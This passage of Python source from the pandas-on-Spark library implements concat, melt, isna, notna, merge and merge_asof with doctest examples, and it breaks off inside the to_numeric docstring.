duplicated = [label for label in psdf._internal.column_labels if label in column_labels]\n if len(duplicated) > 0:\n pretty_names = [name_like_string(label) for label in duplicated]\n raise ValueError(\n \"Labels have to be unique; however, got duplicated labels %s.\" % pretty_names\n )\n column_labels.extend(psdf._internal.column_labels)\n\n if same_anchor(concat_psdf, psdf):\n concat_psdf = DataFrame(\n concat_psdf._internal.with_new_columns(\n [\n concat_psdf._psser_for(label)\n for label in concat_psdf._internal.column_labels\n ]\n + [psdf._psser_for(label) for label in psdf._internal.column_labels]\n )\n )\n else:\n psdfs_not_same_anchor.append(psdf)\n\n if len(psdfs_not_same_anchor) > 0:\n\n @no_type_check\n def resolve_func(psdf, this_column_labels, that_column_labels):\n raise AssertionError(\"This should not happen.\")\n\n for psdf in psdfs_not_same_anchor:\n if join == \"inner\":\n concat_psdf = align_diff_frames(\n resolve_func,\n concat_psdf,\n psdf,\n fillna=False,\n how=\"inner\",\n )\n elif join == \"outer\":\n concat_psdf = align_diff_frames(\n resolve_func,\n concat_psdf,\n psdf,\n fillna=False,\n how=\"full\",\n )\n\n concat_psdf = concat_psdf[column_labels]\n\n if ignore_index:\n concat_psdf.columns = list( # type: ignore[assignment]\n map(str, _range(len(concat_psdf.columns)))\n )\n\n if sort:\n concat_psdf = concat_psdf.sort_index()\n\n return concat_psdf\n\n # Series, Series ...\n # We should return Series if objects are all Series.\n should_return_series = all(map(lambda obj: isinstance(obj, Series), objs))\n\n # DataFrame, Series ... & Series, Series ...\n # In this case, we should return DataFrame.\n new_objs: List[DataFrame] = []\n num_series = 0\n series_names = set()\n for obj in objs:\n if isinstance(obj, Series):\n num_series += 1\n series_names.add(obj.name)\n new_objs.append(obj.to_frame(DEFAULT_SERIES_NAME))\n else:\n assert isinstance(obj, DataFrame)\n new_objs.append(obj)\n\n column_labels_levels: Set[int] = set(obj._internal.column_labels_level for obj in new_objs)\n if len(column_labels_levels) != 1:\n raise ValueError(\"MultiIndex columns should have the same levels\")\n\n # DataFrame, DataFrame, ...\n # All Series are converted into DataFrame and then compute concat.\n if not ignore_index:\n indices_of_psdfs = [psdf.index for psdf in new_objs]\n index_of_first_psdf = indices_of_psdfs[0]\n for index_of_psdf in indices_of_psdfs:\n if index_of_first_psdf.names != index_of_psdf.names:\n raise ValueError(\n \"Index type and names should be same in the objects to concatenate. \"\n \"You passed different indices \"\n \"{index_of_first_psdf} and {index_of_psdf}\".format(\n index_of_first_psdf=index_of_first_psdf.names,\n index_of_psdf=index_of_psdf.names,\n )\n )\n\n column_labels_of_psdfs = [psdf._internal.column_labels for psdf in new_objs]\n index_names_of_psdfs: List[List[Optional[Label]]]\n if ignore_index:\n index_names_of_psdfs = [[] for _ in new_objs]\n else:\n index_names_of_psdfs = [psdf._internal.index_names for psdf in new_objs]\n\n if all(name == index_names_of_psdfs[0] for name in index_names_of_psdfs) and all(\n idx == column_labels_of_psdfs[0] for idx in column_labels_of_psdfs\n ):\n # If all columns are in the same order and values, use it.\n psdfs = new_objs\n else:\n if join == \"inner\":\n interested_columns = set.intersection(*map(lambda x: set(x), column_labels_of_psdfs))\n # Keep the column order with its firsts DataFrame.\n merged_columns = [\n label for label in column_labels_of_psdfs[0] if label in interested_columns\n ]\n\n # If sort is True, sort to follow pandas 1.4+ behavior.\n if sort:\n # FIXME: better ordering\n merged_columns = sorted(merged_columns, key=name_like_string)\n\n psdfs = [psdf[merged_columns] for psdf in new_objs]\n elif join == \"outer\":\n merged_columns = []\n for labels in column_labels_of_psdfs:\n merged_columns.extend(label for label in labels if label not in merged_columns)\n\n assert len(merged_columns) > 0\n\n # If sort is True, always sort\n if sort:\n # FIXME: better ordering\n merged_columns = sorted(merged_columns, key=name_like_string)\n\n psdfs = []\n for psdf in new_objs:\n columns_to_add = list(set(merged_columns) - set(psdf._internal.column_labels))\n\n # TODO: NaN and None difference for missing values. pandas seems to be filling NaN.\n sdf = psdf._internal.resolved_copy.spark_frame\n for label in columns_to_add:\n sdf = sdf.withColumn(name_like_string(label), F.lit(None))\n\n data_columns = psdf._internal.data_spark_column_names + [\n name_like_string(label) for label in columns_to_add\n ]\n psdf = DataFrame(\n psdf._internal.copy(\n spark_frame=sdf,\n index_spark_columns=[\n scol_for(sdf, col) for col in psdf._internal.index_spark_column_names\n ],\n column_labels=(psdf._internal.column_labels + columns_to_add),\n data_spark_columns=[scol_for(sdf, col) for col in data_columns],\n data_fields=(psdf._internal.data_fields + ([None] * len(columns_to_add))),\n )\n )\n\n psdfs.append(psdf[merged_columns])\n\n if ignore_index:\n sdfs = [\n psdf._internal.spark_frame.select(psdf._internal.data_spark_columns) for psdf in psdfs\n ]\n else:\n sdfs = [\n psdf._internal.spark_frame.select(\n psdf._internal.index_spark_columns + psdf._internal.data_spark_columns\n )\n for psdf in psdfs\n ]\n concatenated = reduce(lambda x, y: x.union(y), sdfs)\n\n if ignore_index:\n index_spark_column_names = []\n index_names = []\n index_fields = []\n else:\n index_spark_column_names = psdfs[0]._internal.index_spark_column_names\n index_names = psdfs[0]._internal.index_names\n index_fields = psdfs[0]._internal.index_fields\n\n result_psdf: DataFrame = DataFrame(\n psdfs[0]._internal.copy(\n spark_frame=concatenated,\n index_spark_columns=[scol_for(concatenated, col) for col in index_spark_column_names],\n index_names=index_names,\n index_fields=index_fields,\n data_spark_columns=[\n scol_for(concatenated, col) for col in psdfs[0]._internal.data_spark_column_names\n ],\n data_fields=None, # TODO: dtypes?\n )\n )\n\n if should_return_series:\n # If all input were Series, we should return Series.\n if len(series_names) == 1:\n name = series_names.pop()\n else:\n name = None\n return first_series(result_psdf).rename(name)\n else:\n return result_psdf\n\n\ndef melt(\n frame: DataFrame,\n id_vars: Optional[Union[Name, List[Name]]] = None,\n value_vars: Optional[Union[Name, List[Name]]] = None,\n var_name: Optional[Union[str, List[str]]] = None,\n value_name: str = \"value\",\n) -> DataFrame:\n return DataFrame.melt(frame, id_vars, value_vars, var_name, value_name)\n\n\nmelt.__doc__ = DataFrame.melt.__doc__\n\n\n@no_type_check\ndef isna(obj):\n \"\"\"\n Detect missing values for an array-like object.\n\n This function takes a scalar or array-like object and indicates\n whether values are missing (``NaN`` in numeric arrays, ``None`` or ``NaN``\n in object arrays).\n\n Parameters\n ----------\n obj : scalar or array-like\n Object to check for null or missing values.\n\n Returns\n -------\n bool or array-like of bool\n For scalar input, returns a scalar boolean.\n For array input, returns an array of boolean indicating whether each\n corresponding element is missing.\n\n See Also\n --------\n Series.isna : Detect missing values in a Series.\n Series.isnull : Detect missing values in a Series.\n DataFrame.isna : Detect missing values in a DataFrame.\n DataFrame.isnull : Detect missing values in a DataFrame.\n Index.isna : Detect missing values in an Index.\n Index.isnull : Detect missing values in an Index.\n\n Examples\n --------\n Scalar arguments (including strings) result in a scalar boolean.\n\n >>> ps.isna('dog')\n False\n\n >>> ps.isna(np.nan)\n True\n\n ndarrays result in an ndarray of booleans.\n\n >>> array = np.array([[1, np.nan, 3], [4, 5, np.nan]])\n >>> array\n array([[ 1., nan, 3.],\n [ 4., 5., nan]])\n >>> ps.isna(array)\n array([[False, True, False],\n [False, False, True]])\n\n For Series and DataFrame, the same type is returned, containing booleans.\n\n >>> df = ps.DataFrame({'a': ['ant', 'bee', 'cat'], 'b': ['dog', None, 'fly']})\n >>> df\n a b\n 0 ant dog\n 1 bee None\n 2 cat fly\n\n >>> ps.isna(df)\n a b\n 0 False False\n 1 False True\n 2 False False\n\n >>> ps.isnull(df.b)\n 0 False\n 1 True\n 2 False\n Name: b, dtype: bool\n \"\"\"\n # TODO: Add back:\n # notnull : Boolean inverse of pandas.isnull.\n # into the See Also in the docstring. It does not find the method in the latest numpydoc.\n if isinstance(obj, (DataFrame, Series)):\n return obj.isnull()\n else:\n return pd.isnull(obj)\n\n\nisnull = isna\n\n\n@no_type_check\ndef notna(obj):\n \"\"\"\n Detect existing (non-missing) values.\n\n Return a boolean same-sized object indicating if the values are not NA.\n Non-missing values get mapped to True. NA values, such as None or\n :attr:`numpy.NaN`, get mapped to False values.\n\n Returns\n -------\n bool or array-like of bool\n Mask of bool values for each element that\n indicates whether an element is not an NA value.\n\n See Also\n --------\n isna : Detect missing values for an array-like object.\n Series.notna : Boolean inverse of Series.isna.\n DataFrame.notnull : Boolean inverse of DataFrame.isnull.\n Index.notna : Boolean inverse of Index.isna.\n Index.notnull : Boolean inverse of Index.isnull.\n\n Examples\n --------\n Show which entries in a DataFrame are not NA.\n\n >>> df = ps.DataFrame({'age': [5, 6, np.NaN],\n ... 'born': [pd.NaT, pd.Timestamp('1939-05-27'),\n ... pd.Timestamp('1940-04-25')],\n ... 'name': ['Alfred', 'Batman', ''],\n ... 'toy': [None, 'Batmobile', 'Joker']})\n >>> df\n age born name toy\n 0 5.0 NaT Alfred None\n 1 6.0 1939-05-27 Batman Batmobile\n 2 NaN 1940-04-25 Joker\n\n >>> df.notnull()\n age born name toy\n 0 True False True False\n 1 True True True True\n 2 False True True True\n\n Show which entries in a Series are not NA.\n\n >>> ser = ps.Series([5, 6, np.NaN])\n >>> ser\n 0 5.0\n 1 6.0\n 2 NaN\n dtype: float64\n\n >>> ps.notna(ser)\n 0 True\n 1 True\n 2 False\n dtype: bool\n\n >>> ps.notna(ser.index)\n True\n \"\"\"\n # TODO: Add back:\n # Series.notnull :Boolean inverse of Series.isnull.\n # DataFrame.notna :Boolean inverse of DataFrame.isna.\n # into the See Also in the docstring. It does not find the method in the latest numpydoc.\n if isinstance(obj, (DataFrame, Series)):\n return obj.notna()\n else:\n return pd.notna(obj)\n\n\nnotnull = notna\n\n\ndef merge(\n obj: DataFrame,\n right: DataFrame,\n how: str = \"inner\",\n on: Optional[Union[Name, List[Name]]] = None,\n left_on: Optional[Union[Name, List[Name]]] = None,\n right_on: Optional[Union[Name, List[Name]]] = None,\n left_index: bool = False,\n right_index: bool = False,\n suffixes: Tuple[str, str] = (\"_x\", \"_y\"),\n) -> \"DataFrame\":\n \"\"\"\n Merge DataFrame objects with a database-style join.\n\n The index of the resulting DataFrame will be one of the following:\n - 0...n if no index is used for merging\n - Index of the left DataFrame if merged only on the index of the right DataFrame\n - Index of the right DataFrame if merged only on the index of the left DataFrame\n - All involved indices if merged using the indices of both DataFrames\n e.g. if `left` with indices (a, x) and `right` with indices (b, x), the result will\n be an index (x, a, b)\n\n Parameters\n ----------\n right: Object to merge with.\n how: Type of merge to be performed.\n {'left', 'right', 'outer', 'inner'}, default 'inner'\n\n left: use only keys from left frame, like a SQL left outer join; preserve key\n order.\n right: use only keys from right frame, like a SQL right outer join; preserve key\n order.\n outer: use union of keys from both frames, like a SQL full outer join; sort keys\n lexicographically.\n inner: use intersection of keys from both frames, like a SQL inner join;\n preserve the order of the left keys.\n on: Column or index level names to join on. These must be found in both DataFrames. If on\n is None and not merging on indexes then this defaults to the intersection of the\n columns in both DataFrames.\n left_on: Column or index level names to join on in the left DataFrame. Can also\n be an array or list of arrays of the length of the left DataFrame.\n These arrays are treated as if they are columns.\n right_on: Column or index level names to join on in the right DataFrame. Can also\n be an array or list of arrays of the length of the right DataFrame.\n These arrays are treated as if they are columns.\n left_index: Use the index from the left DataFrame as the join key(s). If it is a\n MultiIndex, the number of keys in the other DataFrame (either the index or a number of\n columns) must match the number of levels.\n right_index: Use the index from the right DataFrame as the join key. Same caveats as\n left_index.\n suffixes: Suffix to apply to overlapping column names in the left and right side,\n respectively.\n\n Returns\n -------\n DataFrame\n A DataFrame of the two merged objects.\n\n Examples\n --------\n\n >>> df1 = ps.DataFrame({'lkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [1, 2, 3, 5]},\n ... columns=['lkey', 'value'])\n >>> df2 = ps.DataFrame({'rkey': ['foo', 'bar', 'baz', 'foo'],\n ... 'value': [5, 6, 7, 8]},\n ... columns=['rkey', 'value'])\n >>> df1\n lkey value\n 0 foo 1\n 1 bar 2\n 2 baz 3\n 3 foo 5\n >>> df2\n rkey value\n 0 foo 5\n 1 bar 6\n 2 baz 7\n 3 foo 8\n\n Merge df1 and df2 on the lkey and rkey columns. The value columns have\n the default suffixes, _x and _y, appended.\n\n >>> merged = ps.merge(df1, df2, left_on='lkey', right_on='rkey')\n >>> merged.sort_values(by=['lkey', 'value_x', 'rkey', 'value_y']) # doctest: +ELLIPSIS\n lkey value_x rkey value_y\n ...bar 2 bar 6\n ...baz 3 baz 7\n ...foo 1 foo 5\n ...foo 1 foo 8\n ...foo 5 foo 5\n ...foo 5 foo 8\n\n >>> left_psdf = ps.DataFrame({'A': [1, 2]})\n >>> right_psdf = ps.DataFrame({'B': ['x', 'y']}, index=[1, 2])\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True).sort_index()\n A B\n 1 2 x\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True, how='left').sort_index()\n A B\n 0 1 None\n 1 2 x\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True, how='right').sort_index()\n A B\n 1 2.0 x\n 2 NaN y\n\n >>> ps.merge(left_psdf, right_psdf, left_index=True, right_index=True, how='outer').sort_index()\n A B\n 0 1.0 None\n 1 2.0 x\n 2 NaN y\n\n Notes\n -----\n As described in #263, joining string columns currently returns None for missing values\n instead of NaN.\n \"\"\"\n return obj.merge(\n right,\n how=how,\n on=on,\n left_on=left_on,\n right_on=right_on,\n left_index=left_index,\n right_index=right_index,\n suffixes=suffixes,\n )\n\n\ndef merge_asof(\n left: Union[DataFrame, Series],\n right: Union[DataFrame, Series],\n on: Optional[Name] = None,\n left_on: Optional[Name] = None,\n right_on: Optional[Name] = None,\n left_index: bool = False,\n right_index: bool = False,\n by: Optional[Union[Name, List[Name]]] = None,\n left_by: Optional[Union[Name, List[Name]]] = None,\n right_by: Optional[Union[Name, List[Name]]] = None,\n suffixes: Tuple[str, str] = (\"_x\", \"_y\"),\n tolerance: Optional[Any] = None,\n allow_exact_matches: bool = True,\n direction: str = \"backward\",\n) -> DataFrame:\n \"\"\"\n Perform an asof merge.\n\n This is like a left-join except that we match on nearest\n key rather than equal keys.\n\n For each row in the left DataFrame:\n\n - A \"backward\" search selects the last row in the right DataFrame whose\n 'on' key is less than or equal to the left's key.\n\n - A \"forward\" search selects the first row in the right DataFrame whose\n 'on' key is greater than or equal to the left's key.\n\n - A \"nearest\" search selects the row in the right DataFrame who's 'on'\n key is closest in absolute distance to the left's key.\n\n Optionally match on equivalent keys with 'by' before searching with 'on'.\n\n .. versionadded:: 3.3.0\n\n Parameters\n ----------\n left : DataFrame or named Series\n right : DataFrame or named Series\n on : label\n Field name to join on. Must be found in both DataFrames.\n The data MUST be ordered. This must be a numeric column,\n such as datetimelike, integer, or float. On or left_on/right_on\n must be given.\n left_on : label\n Field name to join on in left DataFrame.\n right_on : label\n Field name to join on in right DataFrame.\n left_index : bool\n Use the index of the left DataFrame as the join key.\n right_index : bool\n Use the index of the right DataFrame as the join key.\n by : column name or list of column names\n Match on these columns before performing merge operation.\n left_by : column name\n Field names to match on in the left DataFrame.\n right_by : column name\n Field names to match on in the right DataFrame.\n suffixes : 2-length sequence (tuple, list, ...)\n Suffix to apply to overlapping column names in the left and right\n side, respectively.\n tolerance : int or Timedelta, optional, default None\n Select asof tolerance within this range; must be compatible\n with the merge index.\n allow_exact_matches : bool, default True\n\n - If True, allow matching with the same 'on' value\n (i.e. less-than-or-equal-to / greater-than-or-equal-to)\n - If False, don't match the same 'on' value\n (i.e., strictly less-than / strictly greater-than).\n\n direction : 'backward' (default), 'forward', or 'nearest'\n Whether to search for prior, subsequent, or closest matches.\n\n Returns\n -------\n merged : DataFrame\n\n See Also\n --------\n merge : Merge with a database-style join.\n merge_ordered : Merge with optional filling/interpolation.\n\n Examples\n --------\n >>> left = ps.DataFrame({\"a\": [1, 5, 10], \"left_val\": [\"a\", \"b\", \"c\"]})\n >>> left\n a left_val\n 0 1 a\n 1 5 b\n 2 10 c\n\n >>> right = ps.DataFrame({\"a\": [1, 2, 3, 6, 7], \"right_val\": [1, 2, 3, 6, 7]})\n >>> right\n a right_val\n 0 1 1\n 1 2 2\n 2 3 3\n 3 6 6\n 4 7 7\n\n >>> ps.merge_asof(left, right, on=\"a\").sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a 1\n 1 5 b 3\n 2 10 c 7\n\n >>> ps.merge_asof(\n ... left,\n ... right,\n ... on=\"a\",\n ... allow_exact_matches=False\n ... ).sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a NaN\n 1 5 b 3.0\n 2 10 c 7.0\n\n >>> ps.merge_asof(\n ... left,\n ... right,\n ... on=\"a\",\n ... direction=\"forward\"\n ... ).sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a 1.0\n 1 5 b 6.0\n 2 10 c NaN\n\n >>> ps.merge_asof(\n ... left,\n ... right,\n ... on=\"a\",\n ... direction=\"nearest\"\n ... ).sort_values(\"a\").reset_index(drop=True)\n a left_val right_val\n 0 1 a 1\n 1 5 b 6\n 2 10 c 7\n\n We can use indexed DataFrames as well.\n\n >>> left = ps.DataFrame({\"left_val\": [\"a\", \"b\", \"c\"]}, index=[1, 5, 10])\n >>> left\n left_val\n 1 a\n 5 b\n 10 c\n\n >>> right = ps.DataFrame({\"right_val\": [1, 2, 3, 6, 7]}, index=[1, 2, 3, 6, 7])\n >>> right\n right_val\n 1 1\n 2 2\n 3 3\n 6 6\n 7 7\n\n >>> ps.merge_asof(left, right, left_index=True, right_index=True).sort_index()\n left_val right_val\n 1 a 1\n 5 b 3\n 10 c 7\n\n Here is a real-world times-series example\n\n >>> quotes = ps.DataFrame(\n ... {\n ... \"time\": [\n ... pd.Timestamp(\"2016-05-25 13:30:00.023\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.023\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.030\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.041\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.049\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.072\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.075\")\n ... ],\n ... \"ticker\": [\n ... \"GOOG\",\n ... \"MSFT\",\n ... \"MSFT\",\n ... \"MSFT\",\n ... \"GOOG\",\n ... \"AAPL\",\n ... \"GOOG\",\n ... \"MSFT\"\n ... ],\n ... \"bid\": [720.50, 51.95, 51.97, 51.99, 720.50, 97.99, 720.50, 52.01],\n ... \"ask\": [720.93, 51.96, 51.98, 52.00, 720.93, 98.01, 720.88, 52.03]\n ... }\n ... )\n >>> quotes\n time ticker bid ask\n 0 2016-05-25 13:30:00.023 GOOG 720.50 720.93\n 1 2016-05-25 13:30:00.023 MSFT 51.95 51.96\n 2 2016-05-25 13:30:00.030 MSFT 51.97 51.98\n 3 2016-05-25 13:30:00.041 MSFT 51.99 52.00\n 4 2016-05-25 13:30:00.048 GOOG 720.50 720.93\n 5 2016-05-25 13:30:00.049 AAPL 97.99 98.01\n 6 2016-05-25 13:30:00.072 GOOG 720.50 720.88\n 7 2016-05-25 13:30:00.075 MSFT 52.01 52.03\n\n >>> trades = ps.DataFrame(\n ... {\n ... \"time\": [\n ... pd.Timestamp(\"2016-05-25 13:30:00.023\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.038\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\"),\n ... pd.Timestamp(\"2016-05-25 13:30:00.048\")\n ... ],\n ... \"ticker\": [\"MSFT\", \"MSFT\", \"GOOG\", \"GOOG\", \"AAPL\"],\n ... \"price\": [51.95, 51.95, 720.77, 720.92, 98.0],\n ... \"quantity\": [75, 155, 100, 100, 100]\n ... }\n ... )\n >>> trades\n time ticker price quantity\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155\n 2 2016-05-25 13:30:00.048 GOOG 720.77 100\n 3 2016-05-25 13:30:00.048 GOOG 720.92 100\n 4 2016-05-25 13:30:00.048 AAPL 98.00 100\n\n By default we are taking the asof of the quotes\n\n >>> ps.merge_asof(\n ... trades, quotes, on=\"time\", by=\"ticker\"\n ... ).sort_values([\"time\", \"ticker\", \"price\"]).reset_index(drop=True)\n time ticker price quantity bid ask\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75 51.95 51.96\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155 51.97 51.98\n 2 2016-05-25 13:30:00.048 AAPL 98.00 100 NaN NaN\n 3 2016-05-25 13:30:00.048 GOOG 720.77 100 720.50 720.93\n 4 2016-05-25 13:30:00.048 GOOG 720.92 100 720.50 720.93\n\n We only asof within 2ms between the quote time and the trade time\n\n >>> ps.merge_asof(\n ... trades,\n ... quotes,\n ... on=\"time\",\n ... by=\"ticker\",\n ... tolerance=sf.expr(\"INTERVAL 2 MILLISECONDS\") # pd.Timedelta(\"2ms\")\n ... ).sort_values([\"time\", \"ticker\", \"price\"]).reset_index(drop=True)\n time ticker price quantity bid ask\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75 51.95 51.96\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155 NaN NaN\n 2 2016-05-25 13:30:00.048 AAPL 98.00 100 NaN NaN\n 3 2016-05-25 13:30:00.048 GOOG 720.77 100 720.50 720.93\n 4 2016-05-25 13:30:00.048 GOOG 720.92 100 720.50 720.93\n\n We only asof within 10ms between the quote time and the trade time\n and we exclude exact matches on time. However *prior* data will\n propagate forward\n\n >>> ps.merge_asof(\n ... trades,\n ... quotes,\n ... on=\"time\",\n ... by=\"ticker\",\n ... tolerance=sf.expr(\"INTERVAL 10 MILLISECONDS\"), # pd.Timedelta(\"10ms\")\n ... allow_exact_matches=False\n ... ).sort_values([\"time\", \"ticker\", \"price\"]).reset_index(drop=True)\n time ticker price quantity bid ask\n 0 2016-05-25 13:30:00.023 MSFT 51.95 75 NaN NaN\n 1 2016-05-25 13:30:00.038 MSFT 51.95 155 51.97 51.98\n 2 2016-05-25 13:30:00.048 AAPL 98.00 100 NaN NaN\n 3 2016-05-25 13:30:00.048 GOOG 720.77 100 NaN NaN\n 4 2016-05-25 13:30:00.048 GOOG 720.92 100 NaN NaN\n \"\"\"\n\n def to_list(os: Optional[Union[Name, List[Name]]]) -> List[Label]:\n if os is None:\n return []\n elif is_name_like_tuple(os):\n return [cast(Label, os)]\n elif is_name_like_value(os):\n return [(os,)]\n else:\n return [o if is_name_like_tuple(o) else (o,) for o in os]\n\n if isinstance(left, Series):\n left = left.to_frame()\n if isinstance(right, Series):\n right = right.to_frame()\n\n if on:\n if left_on or right_on:\n raise ValueError(\n 'Can only pass argument \"on\" OR \"left_on\" and \"right_on\", '\n \"not a combination of both.\"\n )\n left_as_of_names = list(map(left._internal.spark_column_name_for, to_list(on)))\n right_as_of_names = list(map(right._internal.spark_column_name_for, to_list(on)))\n else:\n if left_index:\n if isinstance(left.index, MultiIndex):\n raise ValueError(\"left can only have one index\")\n left_as_of_names = left._internal.index_spark_column_names\n else:\n left_as_of_names = list(map(left._internal.spark_column_name_for, to_list(left_on)))\n if right_index:\n if isinstance(right.index, MultiIndex):\n raise ValueError(\"right can only have one index\")\n right_as_of_names = right._internal.index_spark_column_names\n else:\n right_as_of_names = list(map(right._internal.spark_column_name_for, to_list(right_on)))\n\n if left_as_of_names and not right_as_of_names:\n raise ValueError(\"Must pass right_on or right_index=True\")\n if right_as_of_names and not left_as_of_names:\n raise ValueError(\"Must pass left_on or left_index=True\")\n if not left_as_of_names and not right_as_of_names:\n common = list(left.columns.intersection(right.columns))\n if len(common) == 0:\n raise ValueError(\n \"No common columns to perform merge on. Merge options: \"\n \"left_on=None, right_on=None, left_index=False, right_index=False\"\n )\n left_as_of_names = list(map(left._internal.spark_column_name_for, to_list(common)))\n right_as_of_names = list(map(right._internal.spark_column_name_for, to_list(common)))\n\n if len(left_as_of_names) != 1:\n raise ValueError(\"can only asof on a key for left\")\n if len(right_as_of_names) != 1:\n raise ValueError(\"can only asof on a key for right\")\n\n if by:\n if left_by or right_by:\n raise ValueError('Can only pass argument \"by\" OR \"left_by\" and \"right_by\".')\n left_join_on_names = list(map(left._internal.spark_column_name_for, to_list(by)))\n right_join_on_names = list(map(right._internal.spark_column_name_for, to_list(by)))\n else:\n left_join_on_names = list(map(left._internal.spark_column_name_for, to_list(left_by)))\n right_join_on_names = list(map(right._internal.spark_column_name_for, to_list(right_by)))\n\n if left_join_on_names and not right_join_on_names:\n raise ValueError(\"missing right_by\")\n if right_join_on_names and not left_join_on_names:\n raise ValueError(\"missing left_by\")\n if len(left_join_on_names) != len(right_join_on_names):\n raise ValueError(\"left_by and right_by must be same length\")\n\n # We should distinguish the name to avoid ambiguous column name after merging.\n right_prefix = \"__right_\"\n right_as_of_names = [right_prefix + right_as_of_name for right_as_of_name in right_as_of_names]\n right_join_on_names = [\n right_prefix + right_join_on_name for right_join_on_name in right_join_on_names\n ]\n\n left_as_of_name = left_as_of_names[0]\n right_as_of_name = right_as_of_names[0]\n\n def resolve(internal: InternalFrame, side: str) -> InternalFrame:\n def rename(col: str) -> str:\n return \"__{}_{}\".format(side, col)\n\n internal = internal.resolved_copy\n sdf = internal.spark_frame\n sdf = sdf.select(\n *[\n scol_for(sdf, col).alias(rename(col))\n for col in sdf.columns\n if col not in HIDDEN_COLUMNS\n ],\n *HIDDEN_COLUMNS,\n )\n return internal.copy(\n spark_frame=sdf,\n index_spark_columns=[\n scol_for(sdf, rename(col)) for col in internal.index_spark_column_names\n ],\n index_fields=[field.copy(name=rename(field.name)) for field in internal.index_fields],\n data_spark_columns=[\n scol_for(sdf, rename(col)) for col in internal.data_spark_column_names\n ],\n data_fields=[field.copy(name=rename(field.name)) for field in internal.data_fields],\n )\n\n left_internal = left._internal.resolved_copy\n right_internal = resolve(right._internal, \"right\")\n\n left_table = left_internal.spark_frame.alias(\"left_table\")\n right_table = right_internal.spark_frame.alias(\"right_table\")\n\n left_as_of_column = scol_for(left_table, left_as_of_name)\n right_as_of_column = scol_for(right_table, right_as_of_name)\n\n if left_join_on_names:\n left_join_on_columns = [scol_for(left_table, label) for label in left_join_on_names]\n right_join_on_columns = [scol_for(right_table, label) for label in right_join_on_names]\n on = reduce(\n lambda lft, rgt: lft & rgt,\n [lft == rgt for lft, rgt in zip(left_join_on_columns, right_join_on_columns)],\n )\n else:\n on = None\n\n Column = get_column_class()\n if tolerance is not None and not isinstance(tolerance, Column):\n tolerance = F.lit(tolerance)\n\n as_of_joined_table = left_table._joinAsOf(\n right_table,\n leftAsOfColumn=left_as_of_column,\n rightAsOfColumn=right_as_of_column,\n on=on,\n how=\"left\",\n tolerance=tolerance,\n allowExactMatches=allow_exact_matches,\n direction=direction,\n )\n\n # Unpack suffixes tuple for convenience\n left_suffix = suffixes[0]\n right_suffix = suffixes[1]\n\n # Append suffixes to columns with the same name to avoid conflicts later\n duplicate_columns = set(left_internal.column_labels) & set(right_internal.column_labels)\n\n exprs = []\n data_columns = []\n column_labels = []\n\n def left_scol_for(label: Label) -> Column: # type: ignore[valid-type]\n return scol_for(as_of_joined_table, left_internal.spark_column_name_for(label))\n\n def right_scol_for(label: Label) -> Column: # type: ignore[valid-type]\n return scol_for(as_of_joined_table, right_internal.spark_column_name_for(label))\n\n for label in left_internal.column_labels:\n col = left_internal.spark_column_name_for(label)\n scol = left_scol_for(label)\n if label in duplicate_columns:\n spark_column_name = left_internal.spark_column_name_for(label)\n if spark_column_name in (left_as_of_names + left_join_on_names) and (\n (right_prefix + spark_column_name) in (right_as_of_names + right_join_on_names)\n ):\n pass\n else:\n col = col + left_suffix\n scol = scol.alias(col) # type: ignore[attr-defined]\n label = tuple([str(label[0]) + left_suffix] + list(label[1:]))\n exprs.append(scol)\n data_columns.append(col)\n column_labels.append(label)\n for label in right_internal.column_labels:\n # recover `right_prefix` here.\n col = right_internal.spark_column_name_for(label)[len(right_prefix) :]\n scol = right_scol_for(label).alias(col) # type: ignore[attr-defined]\n if label in duplicate_columns:\n spark_column_name = left_internal.spark_column_name_for(label)\n if spark_column_name in left_as_of_names + left_join_on_names and (\n (right_prefix + spark_column_name) in right_as_of_names + right_join_on_names\n ):\n continue\n else:\n col = col + right_suffix\n scol = scol.alias(col) # type: ignore[attr-defined]\n label = tuple([str(label[0]) + right_suffix] + list(label[1:]))\n exprs.append(scol)\n data_columns.append(col)\n column_labels.append(label)\n\n # Retain indices if they are used for joining\n if left_index or right_index:\n index_spark_column_names = [\n SPARK_INDEX_NAME_FORMAT(i) for i in range(len(left_internal.index_spark_column_names))\n ]\n left_index_scols = [\n scol.alias(name)\n for scol, name in zip(left_internal.index_spark_columns, index_spark_column_names)\n ]\n exprs.extend(left_index_scols)\n index_names = left_internal.index_names\n else:\n index_spark_column_names = []\n index_names = []\n\n selected_columns = as_of_joined_table.select(*exprs)\n\n internal = InternalFrame(\n spark_frame=selected_columns,\n index_spark_columns=[scol_for(selected_columns, col) for col in index_spark_column_names],\n index_names=index_names,\n column_labels=column_labels,\n data_spark_columns=[scol_for(selected_columns, col) for col in data_columns],\n )\n return DataFrame(internal)\n\n\n@no_type_check\ndef to_numeric(arg, errors=\"raise\"):\n \"\"\"\n Convert argument to a numeric type.\n\n Parameters\n ----------\n arg : scalar, list, tuple, 1-d array, or Series\n Argument to be converted.\n errors : {'raise', 'coerce'}, default 'raise'\n * If 'coerce', then invalid parsing will be set as NaN.\n * If 'raise', then invalid parsing will raise an exception.\n * If 'ignore', then invalid parsing will return the input.\n\n .. note:: 'ignore' doesn't work yet when `arg` is pandas-on-Spark Series.\n\n Returns\n -------\n ret : numeric if parsing succeeded.\n\n See Also\n --------\n DataFrame.astype : Cast argument to a specified 